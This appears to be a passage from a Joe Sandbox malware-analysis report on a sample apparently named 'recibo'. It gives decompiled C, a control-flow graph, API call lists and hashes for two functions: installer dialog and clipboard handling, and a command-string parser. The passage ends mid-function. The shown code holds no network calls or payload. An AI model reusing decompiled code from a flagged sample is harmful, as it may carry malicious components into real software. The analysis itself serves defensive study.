                                                                                  control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 149 4058e4-4058ee 148->149 150 4058c8-4058ce 148->150 154 4058f0-4058f6 149->154 155 405944-405948 149->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 150->152 153 405909-405912 call 404500 150->153 152->149 167 405917-40591b 153->167 159 4058f8-405904 call 404472 154->159 160 40591e-40592e ShowWindow 154->160 155->153 157 40594a-405950 155->157 157->153 165 405952-405965 SendMessageW 157->165 159->153 168 405930-405939 call 40559f 160->168 169 40593e-40593f call 404472 160->169 170 4057f7-40580e call 404499 163->170 171 4057e9-4057f5 SendMessageW 163->171 164->163 172 405a67-405a69 165->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->173 168->169 169->155 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                                  C-Code - Quality: 96%
                                                                                  			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x10442
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x5bcfcc
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}





































                                                                                  0x004056e6
                                                                                  0x004056ec
                                                                                  0x004056f6
                                                                                  0x004056f9
                                                                                  0x00405888
                                                                                  0x0040588f
                                                                                  0x004058ac
                                                                                  0x004058b3
                                                                                  0x004058b3
                                                                                  0x004058b9
                                                                                  0x004058c6
                                                                                  0x004058e4
                                                                                  0x004058e6
                                                                                  0x004058e7
                                                                                  0x004058ee
                                                                                  0x00405944
                                                                                  0x00405944
                                                                                  0x00405948
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040594a
                                                                                  0x0040594d
                                                                                  0x00405950
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040595a
                                                                                  0x00405960
                                                                                  0x00405962
                                                                                  0x00405965
                                                                                  0x00405a67
                                                                                  0x00000000
                                                                                  0x00405a67
                                                                                  0x00405974
                                                                                  0x0040597f
                                                                                  0x00405988
                                                                                  0x0040598f
                                                                                  0x00405993
                                                                                  0x00405996
                                                                                  0x0040599f
                                                                                  0x004059a5
                                                                                  0x004059a8
                                                                                  0x004059a8
                                                                                  0x004059b8
                                                                                  0x004059be
                                                                                  0x004059c0
                                                                                  0x004059c9
                                                                                  0x004059cc
                                                                                  0x004059d3
                                                                                  0x004059da
                                                                                  0x004059e2
                                                                                  0x004059e2
                                                                                  0x004059f0
                                                                                  0x004059f6
                                                                                  0x004059f9
                                                                                  0x004059f9
                                                                                  0x00405a00
                                                                                  0x00405a06
                                                                                  0x00405a12
                                                                                  0x00405a19
                                                                                  0x00405a22
                                                                                  0x00405a24
                                                                                  0x00405a27
                                                                                  0x00405a36
                                                                                  0x00405a39
                                                                                  0x00405a3f
                                                                                  0x00405a40
                                                                                  0x00405a46
                                                                                  0x00405a47
                                                                                  0x00405a48
                                                                                  0x00405a48
                                                                                  0x00405a50
                                                                                  0x00405a5b
                                                                                  0x00405a61
                                                                                  0x00405a61
                                                                                  0x00000000
                                                                                  0x004059c0
                                                                                  0x004058f0
                                                                                  0x004058f6
                                                                                  0x00405926
                                                                                  0x00405928
                                                                                  0x0040592e
                                                                                  0x00405930
                                                                                  0x00405939
                                                                                  0x00405939
                                                                                  0x0040593f
                                                                                  0x00000000
                                                                                  0x0040593f
                                                                                  0x004058fa
                                                                                  0x00405904
                                                                                  0x00000000
                                                                                  0x004058c8
                                                                                  0x004058c8
                                                                                  0x004058ce
                                                                                  0x00405909
                                                                                  0x00000000
                                                                                  0x00405912
                                                                                  0x004058d7
                                                                                  0x004058dc
                                                                                  0x004058df
                                                                                  0x00000000
                                                                                  0x004058df
                                                                                  0x004058c6
                                                                                  0x004056ff
                                                                                  0x00405703
                                                                                  0x0040570b
                                                                                  0x0040570f
                                                                                  0x00405712
                                                                                  0x00405715
                                                                                  0x00405718
                                                                                  0x0040571b
                                                                                  0x0040571c
                                                                                  0x0040571d
                                                                                  0x00405736
                                                                                  0x00405739
                                                                                  0x00405743
                                                                                  0x00405752
                                                                                  0x0040575a
                                                                                  0x00405762
                                                                                  0x00405767
                                                                                  0x0040576a
                                                                                  0x00405776
                                                                                  0x0040577f
                                                                                  0x00405788
                                                                                  0x004057aa
                                                                                  0x004057b0
                                                                                  0x004057c1
                                                                                  0x004057c6
                                                                                  0x004057d4
                                                                                  0x004057e2
                                                                                  0x004057e2
                                                                                  0x004057e7
                                                                                  0x004057f5
                                                                                  0x004057f5
                                                                                  0x004057fa
                                                                                  0x004057fd
                                                                                  0x00405802
                                                                                  0x0040580e
                                                                                  0x00405817
                                                                                  0x00405824
                                                                                  0x00405833
                                                                                  0x00405826
                                                                                  0x0040582b
                                                                                  0x0040582b
                                                                                  0x0040583f
                                                                                  0x0040583f
                                                                                  0x00405853
                                                                                  0x0040585c
                                                                                  0x00405865
                                                                                  0x00405875
                                                                                  0x00405881
                                                                                  0x00405881
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                  • GetClientRect.USER32(?,?), ref: 00405788
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                  • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                  • ShowWindow.USER32(00010442,00000008), ref: 004058DC
                                                                                  • ShowWindow.USER32(00000008), ref: 00405926
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                  • CreatePopupMenu.USER32 ref: 0040596B
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                  • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                  • EmptyClipboard.USER32 ref: 00405A06
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                  • CloseClipboard.USER32 ref: 00405A61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                  • String ID: {
                                                                                  • API String ID: 590372296-366298937
                                                                                  • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                  • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                  • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                  • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 71541BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E71541BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E715412BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E715412BB();
				_t321 = E715412E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E715413B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7154162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x715423e8) & 0x000000ff) * 4 +  &M7154235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E715412CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E715412BB();
											 &_v12 = E71541B86( &_v12);
											__eax = E71541510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E71541B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E71541B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7154405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E71541B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
